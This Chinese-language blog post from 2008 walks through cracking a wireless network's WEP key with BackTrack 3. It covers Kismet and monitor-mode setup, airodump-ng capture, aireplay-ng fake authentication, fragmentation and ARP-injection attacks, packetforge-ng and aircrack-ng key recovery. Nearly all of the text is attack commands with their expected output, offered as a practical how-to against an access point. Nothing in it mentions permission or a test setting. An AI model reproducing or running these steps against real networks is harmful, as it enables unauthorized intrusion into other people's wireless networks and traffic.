2008-09-10 20:41:42 浏览(6239)
注1:经过N天的实际操作,无客户端的WEP破解基本上是无法实现的(运行airodump-ng �ivs �w abc(abc是存盘的文件名)
-c (channel号) 网卡名时#data数为0)。
注2:无客户端的概念:只有AP开着,AP下没有任何有线或无线的网络连接。
注3:BT3下运行Kismet的方法:
#ifconfig wlan0 up
#airmon-ng
显示无线网卡为iwl3945
#modprobe �r iwl3945
#modprobe ipwraw
#iwconfig
显示无线网卡已变成wifi0、monitor mode
编辑/usr/local/etc/kismen.conf文件,把source改为source=iwl3945,wifi0,Intel
存盘。
#kismet
用"s"、"f"、"i"显示单个AP的详细信息。
1. 环境:DELL M1210、Intel Proset 3945 a/b/g无线网卡
2. 下载BT3,解压到U盘(根下BOOT、BT3目录)
3. 运行BOOT下的bootinst.bat,制作U盘启动
4. reboot PC,按F12进入BOOT MENU,选USB
5. 进入BT3菜单,选BT3 Graphics mode (compiz Nvidia)-Experimental
6. 打开一个shell
7. #ifconfig �a(记下本机网卡MAC)
8. 显示无线网卡为wlan0
9. #ifconfig wlan0 up
10. #airmon-ng
11. 显示无线网卡为iwl3945
12. #modprobe �r iwl3945
13. #modprobe ipwraw
#airmon-ng start wifi0 6 将网卡设置成AP监听模式
14. #iwconfig
15. 显示无线网卡已变成wifi0、monitor mode
继续:
1. # airodump-ng --ivs -w name -c 6 wifi0(name是存盘的文件名,6是cannel号)
2. 显示要破解的ap的essid 和mac ,并记下ap的essid 和mac。(#data为0时则为无客户端AP,不能继续)
3. 不关闭这个shell,另开一个shell
4. #aireplay-ng -1 0 -e ap的essid -a ap的mac -h 自己网卡的mac wifi0
5. 显示以下信息则为成功
Sending Authentication Request
Authentication successful
Sending Association Request
Association successful :-)
21.#aireplay-ng -5 -b ap的mac -h 自己网卡的mac wifi0来获得xor文件
如果一切顺利,系统将显示
Use this packet ?
输入y回车,将得到一个xor文件(以fragment开头)
再输入ls 查看当前目录,你将看到刚才生成的一个后缀名为xor 的文件。
22.#packetforge-ng -0 -a ap的mac -h 自己网卡的mac -k 255.255.255.255 -l
255.255.255.255 -y fragment -****-****.xor -w mrarp
其中,-l中的l是L的小写,别和1混淆,而其中的fragment-****-****.xor是刚才生成的文件名。
系统显示:Wrote packet to: mrarp
23.#aireplay-ng -2 �r mrarp -x 1024 wifi0(-x 1024 是限定发包速度,避免网卡死机,选择1024)
输入y回车
前面的抓包窗口上的#data将迅速增加
24.另开shell
25.#wesside-ng �i wifi0 �v ap的MAC,破解完成。
26.到#data增加到3万以上时,另开shell
27.#aircrack-ng -n 64 -b ap的mac name-01.ivs
其中64是64位密码,如果是128位,换成128即可。
(注:摘之网文,还有许多破解方法,破解步骤都差不多,要灵活变通,如有疑问,请多交流.)
蓝色命令为主要执行命令
投稿:技术
评论(1) | 浏览(6239) | 收藏到我的网摘 | 邀请好友阅读
